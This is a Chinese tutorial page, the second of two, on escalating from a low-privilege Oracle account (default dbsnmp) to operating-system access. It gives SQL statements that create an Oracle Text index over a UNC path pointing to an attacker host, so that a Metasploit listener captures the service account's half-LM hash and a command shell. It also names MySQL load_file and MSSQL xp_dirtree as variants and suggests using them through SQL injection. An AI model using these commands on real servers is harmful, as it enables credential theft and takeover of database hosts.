WEB开发网
开发学院网络安全黑客技术 使用低权限 Oracle 数据库账户得到 OS 访问权限 阅读

使用低权限 Oracle 数据库账户得到 OS 访问权限

 2009-06-09 16:55:08 来源:WEB开发网   
核心提示: 图片看不清楚?请点击这里查看原图(大图),图片看不清楚?请点击这里查看原图(大图),使用低权限 Oracle 数据库账户得到 OS 访问权限(2),3.我现在使用 dbsnmp 默认账户连接到 oracle 数据库上,这个账户默认权限是比较低的,如果有注入,服务又是 administrat

图片看不清楚?请点击这里查看原图(大图)。

使用低权限 Oracle 数据库账户得到 OS 访问权限

图片看不清楚?请点击这里查看原图(大图)。

3.我现在使用 dbsnmp 默认账户连接到 oracle 数据库上,这个账户默认权限是比较低的,只有 connect 和 resource 权限。

使用低权限 Oracle 数据库账户得到 OS 访问权限

图片看不清楚?请点击这里查看原图(大图)。

4.然后执行下面 3 条 SQL 语句

SQL> CREATE TABLE files(id NUMBER PRIMARY KEY,path VARCHAR(255)

UNIQUE,ot_format VARCHAR(6));

SQL> INSERT INTO files VALUES(1,’\192.168.1.52mickey’,NULL);

SQL>CREATE INDEX file_index ON files(path) INDEXTYPE IS ctxsys.context

2  PARAMETERS(’datastore ctxsys.file_datastore format column ot_format’);

使用低权限 Oracle 数据库账户得到 OS 访问权限

图片看不清楚?请点击这里查看原图(大图)。

当执行完 create index 这句的时候,在看咱们本地的 metasploit,就已经得到 ORACLE 数据库主机的系统当前服务用户的 half lm 哈希和 cmdshell 了。

使用低权限 Oracle 数据库账户得到 OS 访问权限

图片看不清楚?请点击这里查看原图(大图)。

使用低权限 Oracle 数据库账户得到 OS 访问权限

图片看不清楚?请点击这里查看原图(大图)。

后来经过 pt007 的提醒,我又测试了 mysql,如果服务也是 administrator 启动的,用select load_file(’\\192.168.1.52mk.txt’)也是可以得到系统权限的.MSSQL 应该用 xp_dirtree 存储过程 也是可以的,不过我没有配置出来用 administrator 账户启动 MSSQL 服务,希望知道的朋友指点下我。 这个技术可以用到内网 WEB 评估的时候,如果有注入,服务又是 administrator 启动的,可以提权了。

上一页  1 2 

Tags:使用 权限 Oracle

编辑录入:爽爽 [复制链接] [打 印]
赞助商链接